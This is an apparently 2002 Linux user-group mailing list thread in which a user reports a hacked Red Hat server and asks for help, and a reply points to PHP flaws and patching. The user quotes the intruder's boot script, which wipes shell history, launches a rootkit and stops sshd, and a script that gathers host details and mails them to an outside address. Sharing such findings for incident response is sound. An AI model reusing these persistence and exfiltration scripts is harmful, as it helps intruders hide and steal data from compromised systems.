[lug] i got hacked

D. Stimits stimits at idcomm.com
Thu Apr 18 16:02:54 MDT 2002

j davis wrote:
> i have a box at a place i do contract work about 2 days a month.
> today i could not ssh to it. so iwent on site and discoverd i got
> hacked...like a dummy i didnt have tcp wrappers on or a firewall . i think
> they exploited wu-ftpd
> ..i use redhat 7.1 with wu-ftpd 2.6.1-20...i havent got around to upgrading
> yet.
> anyway here is what i found in /etc/rc3.d/S52remote
> #!/bin/sh
> rm -rf /root/.bash_history
> ln -s /dev/null /root/.bash_history
> cd /dev
> ./ryz -f ./s
> /etc/rc.d/init.d/sshd stop
> cd /
> /usr/bin/trimite
> then here is /usr/bin/trimite
> #!/bin/sh
> echo "* Info : $(uname -a)" >> /tmp/info
> echo "* Hostname : $(hostname -f)" >> /tmp/info
> echo "* IfConfig : $(/sbin/ifconfig | grep inet)" >> /tmp/info
> echo "* Uptime : $(uptime)" >> /tmp/info
> echo "* Cpu Vendor ID : $(cat /proc/cpuinfo|grep vendor_id)" >> /tmp/info
> echo "* Cpu Model : $(cat /proc/cpuinfo|grep model)" >> /tmp/info
> echo "* Cpu Speed: $(cat /proc/cpuinfo|grep MHz)" >> /tmp/info
> echo "* Bogomips: $(cat /proc/cpuinfo|grep bogomips)" >> /tmp/info
> echo "* Spatiu Liber: $(df -h)" >> /tmp/info
> echo "* Ping la Yahoo: $(ping -c3 yahoo.com)" >> /tmp/info
> echo "* Password: $(wc /etc/passwd -l)" >> /tmp/info
> echo "* Portul rootkitului este 25897" >> /tmp/info
> cat /tmp/info | mail -s "root dupa reboot" ryz_ro at yahoo.com
> rm -f /tmp/info
> so, netstat says i have something listening on 25897...what should i do?!
> never benn hacked before....i already turned off ftp and turned on tcp
> wrappers.
> help please
> jd

One possible addition, I can't read the web pages I found due to
languages I don't read, but I have seen PHP noted in a few spots.
Perhaps this exploit is related to recent PHP web server
vulnerabilities. If you have Apache running, it is usually fine as is,
but PHP without recent updates is a guaranteed vulnerability on top of
what was already mentioned. Check your web packages and extensions also
for vulnerabilities and updates.

D. Stimits, stimits at idcomm.com

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